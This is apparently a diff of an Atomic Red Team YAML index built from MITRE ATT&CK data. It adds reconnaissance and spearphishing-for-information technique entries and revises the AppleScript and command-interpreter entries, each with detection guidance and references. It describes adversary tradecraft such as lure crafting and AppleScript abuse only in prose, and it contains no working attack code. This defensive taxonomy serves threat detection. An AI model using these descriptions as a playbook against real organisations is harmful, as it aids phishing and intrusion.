identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + name: Search Open Technical Databases + description: |- + Before compromising a victim, adversaries may search freely available technical databases for information about victims that can be used during targeting. Information about victims may be available in online databases and repositories, such as registrations of domains/certificates as well as public collections of network data/artifacts gathered from traffic and/or scans.(Citation: WHOIS)(Citation: DNS Dumpster)(Citation: Circl Passive DNS)(Citation: Medium SSL Cert)(Citation: SSLShopper Lookup)(Citation: DigitalShadows CDN)(Citation: Shodan) + + Adversaries may search in different open databases depending on what information they seek to gather. Information from these sources may reveal opportunities for other forms of reconnaissance (ex: [Phishing for Information](https://attack.mitre.org/techniques/T1598) or [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593)), establishing operational resources (ex: [Acquire Infrastructure](https://attack.mitre.org/techniques/T1583) or [Compromise Infrastructure](https://attack.mitre.org/techniques/T1584)), and/or initial access (ex: [External Remote Services](https://attack.mitre.org/techniques/T1133) or [Trusted Relationship](https://attack.mitre.org/techniques/T1199)). + id: attack-pattern--55fc4df0-b42c-479a-b860-7a6761bcaad0 + type: attack-pattern + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: reconnaissance + modified: '2020-10-24T04:20:44.166Z' + created: '2020-10-02T16:56:05.810Z' + x_mitre_detection: |- + Much of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders. + + Detection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access. + x_mitre_version: '1.0' + x_mitre_is_subtechnique: false + x_mitre_platforms: + - PRE + atomic_tests: [] + T1593: + technique: + external_references: + - source_name: mitre-attack + external_id: T1593 + url: https://attack.mitre.org/techniques/T1593 + - source_name: Cyware Social Media + url: https://cyware.com/news/how-hackers-exploit-social-media-to-break-into-your-company-88e8da8e + description: Cyware Hacker News. (2019, October 2). How Hackers Exploit Social + Media To Break Into Your Company. Retrieved October 20, 2020. + - source_name: SecurityTrails Google Hacking + url: https://securitytrails.com/blog/google-hacking-techniques + description: Borges, E. (2019, March 5). Exploring Google Hacking Techniques. + Retrieved October 20, 2020. + - source_name: ExploitDB GoogleHacking + url: https://www.exploit-db.com/google-hacking-database + description: Offensive Security. (n.d.). Google Hacking Database. Retrieved + October 23, 2020. + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + name: Search Open Websites/Domains + description: |- + Before compromising a victim, adversaries may search freely available websites and/or domains for information about victims that can be used during targeting. Information about victims may be available in various online sites, such as social media, new sites, or those hosting information about business operations such as hiring or requested/rewarded contracts.(Citation: Cyware Social Media)(Citation: SecurityTrails Google Hacking)(Citation: ExploitDB GoogleHacking) + + Adversaries may search in different online sites depending on what information they seek to gather. Information from these sources may reveal opportunities for other forms of reconnaissance (ex: [Phishing for Information](https://attack.mitre.org/techniques/T1598) or [Search Open Technical Databases](https://attack.mitre.org/techniques/T1596)), establishing operational resources (ex: [Establish Accounts](https://attack.mitre.org/techniques/T1585) or [Compromise Accounts](https://attack.mitre.org/techniques/T1586)), and/or initial access (ex: [External Remote Services](https://attack.mitre.org/techniques/T1133) or [Phishing](https://attack.mitre.org/techniques/T1566)). + id: attack-pattern--a0e6614a-7740-4b24-bd65-f1bde09fc365 + type: attack-pattern + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: reconnaissance + modified: '2020-10-24T04:22:46.374Z' + created: '2020-10-02T16:48:04.509Z' + x_mitre_detection: |- + Much of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders. + + Detection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access. + x_mitre_version: '1.0' + x_mitre_is_subtechnique: false + x_mitre_platforms: + - PRE + atomic_tests: [] + T1594: + technique: + external_references: + - source_name: mitre-attack + external_id: T1594 + url: https://attack.mitre.org/techniques/T1594 + - source_name: Comparitech Leak + url: https://www.comparitech.com/blog/vpn-privacy/350-million-customer-records-exposed-online/ + description: Bischoff, P. (2020, October 15). Broadvoice database of more + than 350 million customer records exposed online. Retrieved October 20, + 2020. + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + name: Search Victim-Owned Websites + description: |- + Before compromising a victim, adversaries may search websites owned by the victim for information that can be used during targeting. Victim-owned websites may contain a variety of details, including names of departments/divisions, physical locations, and data about key employees such as names, roles, and contact info (ex: [Email Addresses](https://attack.mitre.org/techniques/T1589/002)). These sites may also have details highlighting business operations and relationships.(Citation: Comparitech Leak) + + Adversaries may search victim-owned websites to gather actionable information. Information from these sources may reveal opportunities for other forms of reconnaissance (ex: [Phishing for Information](https://attack.mitre.org/techniques/T1598) or [Search Open Technical Databases](https://attack.mitre.org/techniques/T1596)), establishing operational resources (ex: [Establish Accounts](https://attack.mitre.org/techniques/T1585) or [Compromise Accounts](https://attack.mitre.org/techniques/T1586)), and/or initial access (ex: [Trusted Relationship](https://attack.mitre.org/techniques/T1199) or [Phishing](https://attack.mitre.org/techniques/T1566)). + id: attack-pattern--16cdd21f-da65-4e4f-bc04-dd7d198c7b26 + type: attack-pattern + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: reconnaissance + modified: '2020-10-24T04:23:37.282Z' + created: '2020-10-02T16:51:50.306Z' + x_mitre_data_sources: + - Web logs + x_mitre_detection: Monitor for suspicious network traffic that could be indicative + of adversary reconnaissance, such as rapid successions of requests indicative + of web crawling and/or large quantities of requests originating from a single + source (especially if the source is known to be associated with an adversary). + Analyzing web metadata may also reveal artifacts that can be attributed to + potentially malicious activity, such as referer or user-agent string HTTP/S + fields. + x_mitre_version: '1.0' + x_mitre_is_subtechnique: false + x_mitre_platforms: + - PRE + atomic_tests: [] + T1593.001: + technique: + external_references: + - source_name: mitre-attack + external_id: T1593.001 + url: https://attack.mitre.org/techniques/T1593/001 + - source_name: Cyware Social Media + url: https://cyware.com/news/how-hackers-exploit-social-media-to-break-into-your-company-88e8da8e + description: Cyware Hacker News. (2019, October 2). How Hackers Exploit Social + Media To Break Into Your Company. Retrieved October 20, 2020. + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + name: Social Media + description: |- + Before compromising a victim, adversaries may search social media for information about victims that can be used during targeting. Social media sites may contain various information about a victim organization, such as business announcements as well as information about the roles, locations, and interests of staff. + + Adversaries may search in different social media sites depending on what information they seek to gather. Threat actors may passively harvest data from these sites, as well as use information gathered to create fake profiles/groups to elicit victim’s into revealing specific information (i.e. [Spearphishing Service](https://attack.mitre.org/techniques/T1598/001)).(Citation: Cyware Social Media) Information from these sources may reveal opportunities for other forms of reconnaissance (ex: [Phishing for Information](https://attack.mitre.org/techniques/T1598) or [Search Open Technical Databases](https://attack.mitre.org/techniques/T1596)), establishing operational resources (ex: [Establish Accounts](https://attack.mitre.org/techniques/T1585) or [Compromise Accounts](https://attack.mitre.org/techniques/T1586)), and/or initial access (ex: [Spearphishing via Service](https://attack.mitre.org/techniques/T1566/003)). + id: attack-pattern--bbe5b322-e2af-4a5e-9625-a4e62bf84ed3 + type: attack-pattern + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: reconnaissance + modified: '2020-10-24T04:22:46.235Z' + created: '2020-10-02T16:49:31.262Z' + x_mitre_detection: |- + Much of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders. + + Detection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access. + x_mitre_version: '1.0' + x_mitre_is_subtechnique: true + x_mitre_platforms: + - PRE + atomic_tests: [] + T1592.002: + technique: + external_references: + - source_name: mitre-attack + external_id: T1592.002 + url: https://attack.mitre.org/techniques/T1592/002 + - source_name: ATT ScanBox + url: https://cybersecurity.att.com/blogs/labs-research/scanbox-a-reconnaissance-framework-used-on-watering-hole-attacks + description: 'Blasco, J. (2014, August 28). Scanbox: A Reconnaissance Framework + Used with Watering Hole Attacks. Retrieved October 19, 2020.' + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + name: Software + description: |- + Before compromising a victim, adversaries may gather information about the victim's host software that can be used during targeting. Information about installed software may include a variety of details such as types and versions on specific hosts, as well as the presence of additional components that might be indicative of added defensive protections (ex: antivirus, SIEMs, etc.). + + Adversaries may gather this information in various ways, such as direct collection actions via [Active Scanning](https://attack.mitre.org/techniques/T1595) (ex: listening ports, server banners, user agent strings) or [Phishing for Information](https://attack.mitre.org/techniques/T1598). Adversaries may also compromise sites then include malicious content designed to collect host information from visitors.(Citation: ATT ScanBox) Information about the installed software may also be exposed to adversaries via online or other accessible data sets (ex: job postings, network maps, assessment reports, resumes, or purchase invoices). Gathering this information may reveal opportunities for other forms of reconnaissance (ex: [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593) or [Search Open Technical Databases](https://attack.mitre.org/techniques/T1596)), establishing operational resources (ex: [Develop Capabilities](https://attack.mitre.org/techniques/T1587) or [Obtain Capabilities](https://attack.mitre.org/techniques/T1588)), and/or for initial access (ex: [Supply Chain Compromise](https://attack.mitre.org/techniques/T1195) or [External Remote Services](https://attack.mitre.org/techniques/T1133)). + id: attack-pattern--baf60e1a-afe5-4d31-830f-1b1ba2351884 + type: attack-pattern + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: reconnaissance + modified: '2020-10-24T03:53:39.162Z' + created: '2020-10-02T16:42:17.482Z' + x_mitre_detection: |- + Much of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders. + + Detection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access. + x_mitre_version: '1.0' + x_mitre_is_subtechnique: true + x_mitre_platforms: + - PRE + atomic_tests: [] + T1598.002: + technique: + external_references: + - source_name: mitre-attack + external_id: T1598.002 + url: https://attack.mitre.org/techniques/T1598/002 + - source_name: Sophos Attachment + url: https://nakedsecurity.sophos.com/2020/10/02/serious-security-phishing-without-links-when-phishers-bring-along-their-own-web-pages/ + description: 'Ducklin, P. (2020, October 2). Serious Security: Phishing without + links – when phishers bring along their own web pages. Retrieved October + 20, 2020.' + - source_name: GitHub Phishery + url: https://github.com/ryhanson/phishery + description: Ryan Hanson. (2016, September 24). phishery. Retrieved October + 23, 2020. + - source_name: Microsoft Anti Spoofing + url: https://docs.microsoft.com/en-us/microsoft-365/security/office-365-security/anti-spoofing-protection?view=o365-worldwide + description: Microsoft. (2020, October 13). Anti-spoofing protection in EOP. + Retrieved October 19, 2020. + - source_name: ACSC Email Spoofing + url: https://www.cyber.gov.au/sites/default/files/2019-03/spoof_email_sender_policy_framework.pdf + description: Australian Cyber Security Centre. (2012, December). Mitigating + Spoofed Emails Using Sender Policy Framework. Retrieved October 19, 2020. + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + name: Spearphishing Attachment + description: |- + Before compromising a victim, adversaries may send spearphishing messages with a malicious attachment to elicit sensitive information that can be used during targeting. Spearphishing for information is an attempt to trick targets into divulging information, frequently credentials or other actionable information. Spearphishing for information frequently involves social engineering techniques, such as posing as a source with a reason to collect information (ex: [Establish Accounts](https://attack.mitre.org/techniques/T1585) or [Compromise Accounts](https://attack.mitre.org/techniques/T1586)) and/or sending multiple, seemingly urgent messages. + + All forms of spearphishing are electronically delivered social engineering targeted at a specific individual, company, or industry. In this scenario, adversaries attach a file to the spearphishing email and usually rely upon the recipient populating information then returning the file.(Citation: Sophos Attachment)(Citation: GitHub Phishery) The text of the spearphishing email usually tries to give a plausible reason why the file should be filled-in, such as a request for information from a business associate. Adversaries may also use information from previous reconnaissance efforts (ex: [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593) or [Search Victim-Owned Websites](https://attack.mitre.org/techniques/T1594)) to craft persuasive and believable lures. + id: attack-pattern--8982a661-d84c-48c0-b4ec-1db29c6cf3bc + type: attack-pattern + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: reconnaissance + modified: '2020-10-24T04:12:48.152Z' + created: '2020-10-02T17:08:57.386Z' + x_mitre_contributors: + - Sebastian Salla, McAfee + - Robert Simmons, @MalwareUtkonos + x_mitre_data_sources: + - Mail server + - Email gateway + x_mitre_detection: 'Monitor for suspicious email activity, such as numerous + accounts receiving messages from a single unusual/unknown sender. Filtering + based on DKIM+SPF or header analysis can help detect when the email sender + is spoofed. Also consider enabling DMARC to verify the sender of emails.(Citation: + Microsoft Anti Spoofing)(Citation: ACSC Email Spoofing)' + x_mitre_version: '1.0' + x_mitre_is_subtechnique: true + x_mitre_platforms: + - PRE + atomic_tests: [] + T1598.003: + technique: + external_references: + - source_name: mitre-attack + external_id: T1598.003 + url: https://attack.mitre.org/techniques/T1598/003 + - source_name: TrendMictro Phishing + url: https://www.trendmicro.com/en_us/research/20/i/tricky-forms-of-phishing.html + description: Babon, P. (2020, September 3). Tricky 'Forms' of Phishing. Retrieved + October 20, 2020. + - source_name: PCMag FakeLogin + url: https://www.pcmag.com/news/hackers-try-to-phish-united-nations-staffers-with-fake-login-pages + description: Kan, M. (2019, October 24). Hackers Try to Phish United Nations + Staffers With Fake Login Pages. Retrieved October 20, 2020. + - source_name: Microsoft Anti Spoofing + url: https://docs.microsoft.com/en-us/microsoft-365/security/office-365-security/anti-spoofing-protection?view=o365-worldwide + description: Microsoft. (2020, October 13). Anti-spoofing protection in EOP. + Retrieved October 19, 2020. + - source_name: ACSC Email Spoofing + url: https://www.cyber.gov.au/sites/default/files/2019-03/spoof_email_sender_policy_framework.pdf + description: Australian Cyber Security Centre. (2012, December). Mitigating + Spoofed Emails Using Sender Policy Framework. Retrieved October 19, 2020. + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + name: Spearphishing Link + description: |- + Before compromising a victim, adversaries may send spearphishing messages with a malicious link to elicit sensitive information that can be used during targeting. Spearphishing for information is an attempt to trick targets into divulging information, frequently credentials or other actionable information. Spearphishing for information frequently involves social engineering techniques, such as posing as a source with a reason to collect information (ex: [Establish Accounts](https://attack.mitre.org/techniques/T1585) or [Compromise Accounts](https://attack.mitre.org/techniques/T1586)) and/or sending multiple, seemingly urgent messages. + + All forms of spearphishing are electronically delivered social engineering targeted at a specific individual, company, or industry. In this scenario, the malicious emails contain links generally accompanied by social engineering text to coax the user to actively click or copy and paste a URL into a browser.(Citation: TrendMictro Phishing)(Citation: PCMag FakeLogin) The given website may closely resemble a legitimate site in appearance and have a URL containing elements from the real site. From the fake website, information is gathered in web forms and sent to the attacker. Adversaries may also use information from previous reconnaissance efforts (ex: [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593) or [Search Victim-Owned Websites](https://attack.mitre.org/techniques/T1594)) to craft persuasive and believable lures. + id: attack-pattern--2d3f5b3c-54ca-4f4d-bb1f-849346d31230 + type: attack-pattern + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: reconnaissance + modified: '2020-10-24T04:13:12.752Z' + created: '2020-10-02T17:09:50.723Z' + x_mitre_contributors: + - Sebastian Salla, McAfee + - Robert Simmons, @MalwareUtkonos + x_mitre_data_sources: + - Mail server + - Email gateway + x_mitre_detection: |- + Monitor for suspicious email activity, such as numerous accounts receiving messages from a single unusual/unknown sender. Filtering based on DKIM+SPF or header analysis can help detect when the email sender is spoofed. Also consider enabling DMARC to verify the sender of emails.(Citation: Microsoft Anti Spoofing)(Citation: ACSC Email Spoofing) + + Monitor for references to uncategorized or known-bad sites. URL inspection within email (including expanding shortened links) can also help detect links leading to known malicious sites. + x_mitre_version: '1.0' + x_mitre_is_subtechnique: true + x_mitre_platforms: + - PRE + atomic_tests: [] + T1598.001: + technique: + external_references: + - source_name: mitre-attack + external_id: T1598.001 + url: https://attack.mitre.org/techniques/T1598/001 + - source_name: ThreatPost Social Media Phishing + url: https://threatpost.com/facebook-launching-pad-phishing-attacks/160351/ + description: 'O''Donnell, L. (2020, October 20). Facebook: A Top Launching + Pad For Phishing Attacks. Retrieved October 20, 2020.' + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + name: Spearphishing Service + description: |- + Before compromising a victim, adversaries may send spearphishing messages via third-party services to elicit sensitive information that can be used during targeting. Spearphishing for information is an attempt to trick targets into divulging information, frequently credentials or other actionable information. Spearphishing for information frequently involves social engineering techniques, such as posing as a source with a reason to collect information (ex: [Establish Accounts](https://attack.mitre.org/techniques/T1585) or [Compromise Accounts](https://attack.mitre.org/techniques/T1586)) and/or sending multiple, seemingly urgent messages. + + All forms of spearphishing are electronically delivered social engineering targeted at a specific individual, company, or industry. In this scenario, adversaries send messages through various social media services, personal webmail, and other non-enterprise controlled services.(Citation: ThreatPost Social Media Phishing) These services are more likely to have a less-strict security policy than an enterprise. As with most kinds of spearphishing, the goal is to generate rapport with the target or get the target's interest in some way. Adversaries may create fake social media accounts and message employees for potential job opportunities. Doing so allows a plausible reason for asking about services, policies, and information about their environment. Adversaries may also use information from previous reconnaissance efforts (ex: [Social Media](https://attack.mitre.org/techniques/T1593/001) or [Search Victim-Owned Websites](https://attack.mitre.org/techniques/T1594)) to craft persuasive and believable lures. + id: attack-pattern--f870408c-b1cd-49c7-a5c7-0ef0fc496cc6 + type: attack-pattern + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: reconnaissance + modified: '2020-10-25T19:44:58.093Z' + created: '2020-10-02T17:08:07.742Z' + x_mitre_contributors: + - Robert Simmons, @MalwareUtkonos + x_mitre_detection: |- + Monitor social media traffic for suspicious activity, including messages requesting information as well as abnormal file or data transfers (especially those involving unknown, or otherwise suspicious accounts). + + Much of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders. + + Detection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access. + x_mitre_version: '1.0' + x_mitre_is_subtechnique: true + x_mitre_platforms: + - PRE + atomic_tests: [] + T1597.001: + technique: + external_references: + - source_name: mitre-attack + external_id: T1597.001 + url: https://attack.mitre.org/techniques/T1597/001 + - source_name: D3Secutrity CTI Feeds + url: https://d3security.com/blog/10-of-the-best-open-source-threat-intelligence-feeds/ + description: Banerd, W. (2019, April 30). 10 of the Best Open Source Threat + Intelligence Feeds. Retrieved October 20, 2020. + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + name: Threat Intel Vendors + description: |- + Before compromising a victim, adversaries may search private data from threat intelligence vendors for information that can be used during targeting. Threat intelligence vendors may offer paid feeds or portals that offer more data than what is publicly reported. Although sensitive details (such as customer names and other identifiers) may be redacted, this information may contain trends regarding breaches such as target industries, attribution claims, and successful TTPs/countermeasures.(Citation: D3Secutrity CTI Feeds) + + Adversaries may search in private threat intelligence vendor data to gather actionable information. Threat actors may seek information/indicators gathered about their own campaigns, as well as those conducted by other adversaries that may align with their target industries, capabilities/objectives, or other operational concerns. Information reported by vendors may also reveal opportunities other forms of reconnaissance (ex: [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593)), establishing operational resources (ex: [Develop Capabilities](https://attack.mitre.org/techniques/T1587) or [Obtain Capabilities](https://attack.mitre.org/techniques/T1588)), and/or initial access (ex: [Exploit Public-Facing Application](https://attack.mitre.org/techniques/T1190) or [External Remote Services](https://attack.mitre.org/techniques/T1133)). + id: attack-pattern--51e54974-a541-4fb6-a61b-0518e4c6de41 + type: attack-pattern + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: reconnaissance + modified: '2020-10-24T04:15:53.678Z' + created: '2020-10-02T17:03:45.918Z' + x_mitre_detection: |- + Much of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders. + + Detection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access. + x_mitre_version: '1.0' + x_mitre_is_subtechnique: true + x_mitre_platforms: + - PRE + atomic_tests: [] + T1595.002: + technique: + external_references: + - source_name: mitre-attack + external_id: T1595.002 + url: https://attack.mitre.org/techniques/T1595/002 + - source_name: OWASP Vuln Scanning + url: https://wiki.owasp.org/index.php/OAT-014_Vulnerability_Scanning + description: OWASP Wiki. (2018, February 16). OAT-014 Vulnerability Scanning. + Retrieved October 20, 2020. + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + name: Vulnerability Scanning + description: |- + Before compromising a victim, adversaries may scan victims for vulnerabilities that can be used during targeting. Vulnerability scans typically check if the configuration of a target host/application (ex: software and version) potentially aligns with the target of a specific exploit the adversary may seek to use. + + These scans may also include more broad attempts to [Gather Victim Host Information](https://attack.mitre.org/techniques/T1592) that can be used to identify more commonly known, exploitable vulnerabilities. Vulnerability scans typically harvest running software and version numbers via server banners, listening ports, or other network artifacts.(Citation: OWASP Vuln Scanning) Information from these scans may reveal opportunities for other forms of reconnaissance (ex: [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593) or [Search Open Technical Databases](https://attack.mitre.org/techniques/T1596)), establishing operational resources (ex: [Develop Capabilities](https://attack.mitre.org/techniques/T1587) or [Obtain Capabilities](https://attack.mitre.org/techniques/T1588)), and/or initial access (ex: [Exploit Public-Facing Application](https://attack.mitre.org/techniques/T1190)). + id: attack-pattern--5502c4e9-24ef-4d5f-8ee9-9e906c2f82c4 + type: attack-pattern + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: reconnaissance + modified: '2020-10-24T03:58:06.761Z' + created: '2020-10-02T16:55:16.047Z' + x_mitre_data_sources: + - Packet capture + - Network device logs + x_mitre_detection: |- + Monitor for suspicious network traffic that could be indicative of scanning, such as large quantities originating from a single source (especially if the source is known to be associated with an adversary/botnet). Analyzing web metadata may also reveal artifacts that can be attributed to potentially malicious activity, such as referer or user-agent string HTTP/S fields. + + Much of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders. + + Detection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access. + x_mitre_version: '1.0' + x_mitre_is_subtechnique: true + x_mitre_platforms: + - PRE + atomic_tests: [] + T1596.002: + technique: + external_references: + - source_name: mitre-attack + external_id: T1596.002 + url: https://attack.mitre.org/techniques/T1596/002 + - source_name: WHOIS + url: https://www.whois.net/ + description: NTT America. (n.d.). Whois Lookup. Retrieved October 20, 2020. + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + name: WHOIS + description: |- + Before compromising a victim, adversaries may search public WHOIS data for information about victims that can be used during targeting. WHOIS data is stored by regional Internet registries (RIR) responsible for allocating and assigning Internet resources such as domain names. Anyone can query WHOIS servers for information about a registered domain, such as assigned IP blocks, contact information, and DNS nameservers.(Citation: WHOIS) + + Adversaries may search WHOIS data to gather actionable information. Threat actors can use online resources or command-line utilities to pillage through WHOIS data for information about potential victims. Information from these sources may reveal opportunities for other forms of reconnaissance (ex: [Active Scanning](https://attack.mitre.org/techniques/T1595) or [Phishing for Information](https://attack.mitre.org/techniques/T1598)), establishing operational resources (ex: [Acquire Infrastructure](https://attack.mitre.org/techniques/T1583) or [Compromise Infrastructure](https://attack.mitre.org/techniques/T1584)), and/or initial access (ex: [External Remote Services](https://attack.mitre.org/techniques/T1133) or [Trusted Relationship](https://attack.mitre.org/techniques/T1199)). + id: attack-pattern--166de1c6-2814-4fe5-8438-4e80f76b169f + type: attack-pattern + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: reconnaissance + modified: '2020-10-24T04:20:43.941Z' + created: '2020-10-02T16:56:49.744Z' + x_mitre_detection: |- + Much of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders. + + Detection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access. + x_mitre_version: '1.0' + x_mitre_is_subtechnique: true + x_mitre_platforms: + - PRE atomic_tests: [] execution: T1059.002: @@ -43149,6 +50945,14 @@ execution: url: https://developer.apple.com/library/archive/documentation/AppleScript/Conceptual/AppleScriptLangGuide/introduction/ASLR_intro.html description: Apple. (2016, January 25). Introduction to AppleScript Language Guide. Retrieved March 28, 2020. + - source_name: SentinelOne AppleScript + url: https://www.sentinelone.com/blog/how-offensive-actors-use-applescript-for-attacking-macos/ + description: Phil Stokes. (2020, March 16). How Offensive Actors Use AppleScript + For Attacking macOS. Retrieved July 17, 2020. + - source_name: SentinelOne macOS Red Team + url: https://www.sentinelone.com/blog/macos-red-team-calling-apple-apis-without-building-binaries/ + description: 'Phil Stokes. (2019, December 5). macOS Red Team: Calling Apple + APIs Without Building Binaries. Retrieved July 17, 2020.' - url: https://www.mcafee.com/blogs/other-blogs/mcafee-labs/macro-malware-targets-macs/ description: Yerko Grbic. (2017, February 14). Macro Malware Targets Macs. Retrieved July 8, 2017. @@ -43158,25 +50962,32 @@ execution: created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 name: AppleScript description: |- - Adversaries may abuse AppleScript for execution. AppleScript is a macOS scripting language designed to control applications and parts of the OS via inter-application messages called AppleEvents. (Citation: Apple AppleScript) These AppleEvent messages can be easily scripted with AppleScript for local or remote execution. + Adversaries may abuse AppleScript for execution. AppleScript is a macOS scripting language designed to control applications and parts of the OS via inter-application messages called AppleEvents.(Citation: Apple AppleScript) These AppleEvent messages can be sent independently or easily scripted with AppleScript. These events can locate open windows, send keystrokes, and interact with almost any open application locally or remotely. - osascript executes AppleScript and any other Open Scripting Architecture (OSA) language scripts. A list of OSA languages installed on a system can be found by using the osalang program. AppleEvent messages can be sent independently or as part of a script. These events can locate open windows, send keystrokes, and interact with almost any open application locally or remotely. + Scripts can be run from the command-line via osascript /path/to/script or osascript -e "script here". Aside from the command line, scripts can be executed in numerous ways including Mail rules, Calendar.app alarms, and Automator workflows. AppleScripts can also be executed as plain text shell scripts by adding #!/usr/bin/osascript to the start of the script file.(Citation: SentinelOne AppleScript) - Adversaries can use this to execute various behaviors, such as interacting with an open SSH connection, moving to remote machines, and even presenting users with fake dialog boxes. These events cannot start applications remotely (they can start them locally though), but can interact with applications if they're already running remotely. Since this is a scripting language, it can be used to launch more common techniques as well such as a reverse shell via [Python](https://attack.mitre.org/techniques/T1059/006)(Citation: Macro Malware Targets Macs). Scripts can be run from the command-line via osascript /path/to/script or osascript -e "script here". + AppleScripts do not need to call osascript to execute, however. They may be executed from within mach-O binaries by using the macOS [Native API](https://attack.mitre.org/techniques/T1106)s NSAppleScript or OSAScript, both of which execute code independent of the /usr/bin/osascript command line utility. + + Adversaries may abuse AppleScript to execute various behaviors, such as interacting with an open SSH connection, moving to remote machines, and even presenting users with fake dialog boxes. These events cannot start applications remotely (they can start them locally), but they can interact with applications if they're already running remotely. On macOS 10.10 Yosemite and higher, AppleScript has the ability to execute [Native API](https://attack.mitre.org/techniques/T1106)s, which otherwise would require compilation and execution in a mach-O binary file format.(Citation: SentinelOne macOS Red Team). Since this is a scripting language, it can be used to launch more common techniques as well such as a reverse shell via [Python](https://attack.mitre.org/techniques/T1059/006).(Citation: Macro Malware Targets Macs) id: attack-pattern--37b11151-1776-4f8f-b328-30939fbf2ceb type: attack-pattern kill_chain_phases: - kill_chain_name: mitre-attack phase_name: execution - modified: '2020-04-14T13:28:17.696Z' + modified: '2020-08-03T21:40:51.878Z' created: '2020-03-09T14:07:54.329Z' - x_mitre_version: '1.0' + x_mitre_contributors: + - Phil Stokes, SentinelOne + x_mitre_version: '1.1' x_mitre_is_subtechnique: true x_mitre_permissions_required: - User - x_mitre_detection: Monitor for execution of AppleScript through osascript that - may be related to other suspicious behavior occurring on the system. + x_mitre_detection: |- + Monitor for execution of AppleScript through osascript and usage of the NSAppleScript and OSAScript APIs that may be related to other suspicious behavior occurring on the system. Scripts are likely to perform actions with various effects on a system that may generate events, depending on the types of monitoring used. Monitor processes and command-line arguments for script execution and subsequent behavior. Actions may be related to network and system information [Discovery](https://attack.mitre.org/tactics/TA0007), [Collection](https://attack.mitre.org/tactics/TA0009), or other scriptable post-compromise behaviors and could be used as indicators of detection leading back to the source script. + + Understanding standard usage patterns is important to avoid a high number of false positives. If scripting is restricted for normal users, then any attempts to enable scripts running on a system would be considered suspicious. If scripts are not commonly used on a system, but enabled, scripts running out of cycle from patching or other administrator functions are suspicious. Scripts should be captured from the file system when possible to determine their actions and intent. x_mitre_data_sources: + - API monitoring - Process monitoring - Process command-line parameters x_mitre_platforms: @@ -43412,7 +51223,7 @@ execution: kill_chain_phases: - kill_chain_name: mitre-attack phase_name: execution - modified: '2020-06-25T03:32:51.380Z' + modified: '2020-10-22T16:43:39.362Z' created: '2017-05-31T21:30:49.546Z' x_mitre_is_subtechnique: false x_mitre_remote_support: false @@ -43422,6 +51233,7 @@ execution: - Linux - macOS - Windows + - Network x_mitre_detection: |- Command-line and scripting activities can be captured through proper logging of process execution with command-line arguments. This information can be useful in gaining additional insight to adversaries' actions through how they use native processes or custom tools. Also monitor for loading of modules associated with specific languages. @@ -43433,7 +51245,7 @@ execution: - PowerShell logs - Process monitoring - Process command-line parameters - x_mitre_version: '2.0' + x_mitre_version: '2.1' atomic_tests: [] T1559.001: technique: @@ -44004,13 +51816,14 